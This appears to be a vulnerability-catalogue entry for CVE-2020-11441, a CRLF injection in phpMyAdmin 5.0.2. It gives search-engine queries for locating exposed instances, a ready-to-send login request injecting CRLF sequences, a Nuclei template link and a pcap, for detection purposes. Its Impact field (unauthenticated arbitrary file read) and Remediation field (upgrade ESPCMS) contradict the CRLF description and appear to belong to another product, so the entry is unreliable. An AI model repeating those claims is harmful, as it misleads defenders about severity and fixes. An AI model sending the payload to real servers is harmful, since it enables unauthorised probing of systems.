🔙 목록으로 돌아가기

CVE-2020-11441: phpMyAdmin 5.0.2 - CRLF Injection

TitlephpMyAdmin 5.0.2 - CRLF Injection
Authorritikchaddha
SeverityMedium
ImpactUnauthenticated attackers can read arbitrary files from the server including configuration files and credentials, potentially leading to complete system compromise.
RemediationUpgrade to a patched version of the ESPCMS or apply vendor-provided security updates.
CVSS Score6.1
EPSS Score0.00653
CVE IDCVE-2020-11441
CWE IDCWE-93
Shodan Querytitle:"phpmyadmin"
Fofa Querytitle="phpmyadmin"
Tags cve crlf phpmyadmin cve2020 vuln

🔍 Vulnerability Description

phpMyAdmin 5.0.2 allows CRLF injection, as demonstrated by %0D%0Astring%0D%0A inputs to login form fields causing CRLF sequences to be reflected on an error page. NOTE: the vendor states “I don’t see anything specifically exploitable.

🌐 HTTP Request

GET /index.php?route=/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept-Encoding: gzip
POST /index.php?route=/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 150
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

set_session=7cibpR&pma_username=%0D%0Atest:crlfinjection=1%0D%0A&pma_password=%0D%0Atest:crlfinjection=1%0D%0A&server=1&route=%2F&lang=en&token=eP0ZZW

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11441.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-11441.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A